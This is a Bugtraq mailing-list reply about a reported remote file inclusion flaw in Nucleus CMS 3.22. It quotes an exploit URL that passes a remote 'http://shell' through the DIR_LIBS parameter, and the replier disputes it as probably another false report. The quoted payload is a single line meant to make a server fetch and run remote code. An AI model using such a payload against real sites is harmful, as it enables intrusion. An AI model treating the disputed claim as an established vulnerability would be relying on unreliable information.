Re: nucleus 3.22 >> RFI

看板Bugtraq作者時間18年前 (2007/05/08 00:07), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串2/2 (看更多)
: VENDOR :http://nucleuscms.org/ : BY : s3rv3r_hack3r (hackerz.ir admin) : bug: : nucleus3.22/nucleus/plugins/skinfiles/index.php = include($DIR_LIBS . 'PLUGINADMIN.php'); : Exloit: : http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell I haven't examined the source code to this, but on June 16, 2006, gamr-14@hotmail.com disclosed RFI vulnerabilities [1] in four Nucleus scripts, all with the DIR_LIBS variable as the injection point. This was subsequently proven to be a false report as the variable was previously set and could not be manipulated by an attacker. Have you actually tested this, or is this based on a quick grep of the source code? - jericho [1] http://archives.neohapsis.com/archives/bugtraq/2006-06/0321.html
文章代碼(AID): #16FqxI00 (Bugtraq)
文章代碼(AID): #16FqxI00 (Bugtraq)